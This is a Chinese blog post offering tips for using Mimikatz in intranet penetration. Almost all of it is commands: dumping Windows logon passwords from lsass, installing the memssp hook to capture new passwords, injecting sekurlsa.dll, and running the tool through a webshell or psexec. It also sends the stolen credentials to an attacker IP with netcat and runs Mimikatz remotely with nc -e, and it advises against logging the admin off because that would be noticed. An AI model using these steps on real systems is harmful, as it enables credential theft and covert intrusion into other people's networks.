内网渗透

Mimikatz 使用小技巧

字号+ 作者:蜗蜗侠 来源:WebShell'S Blog 2016-11-26 10:53 我要评论( )

1.记录 Mimikatz 输出: C:\mimikatz.exeprivilege::debuglogsekurlsa::logonpasswordsfullexitdir 2.将输出导入到本地文件: C:\mimikatz.exeprivilege::debugsek......

1.记录 Mimikatz输出:

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:

Attacker执行:

E:\>nc -lvp 4444

Victim执行:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444

192.168.52.1 为Attacker IP

4.通过nc远程执行Mimikatz

Victim执行:

C:\>nc -lvp 443

Attacker执行:

E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe

192.168.52.128 为Victim IP

shenqi

若管理员有每过几天就改密码的习惯,但是mimikatz抓取到的密码都是老密码

QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下

可以使用以下方法尝试解决

privilege::debug
misc::memssp

记录的结果在c:\windows\system32\mimilsa.log
每次验证都会记录  如 锁屏 等  重启失效

出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还是存放的老的。

也可以直接logoff,但是这样会很明显。

文件
mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)

本机终端
绝对路径\mimikatz.exe

privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit

webshell
绝对路径\mimikatz.exe < 绝对路径\c.txt > 绝对路径\userpass.txt
———-c.txt———-

privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit

————————-

远程终端
psexec.exe -s cmd.exe
绝对路径\mimikatz.exe

privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit

【原文:Mimikatz 使用小技巧  作者:WebShell'S Blog 】



本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Intranet/305.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 渗透技巧——Windows日志的删除与绕过

    渗透技巧——Windows日志的删除与绕过

    2017-07-04 09:44

网友点评
暂时未开启评论功能~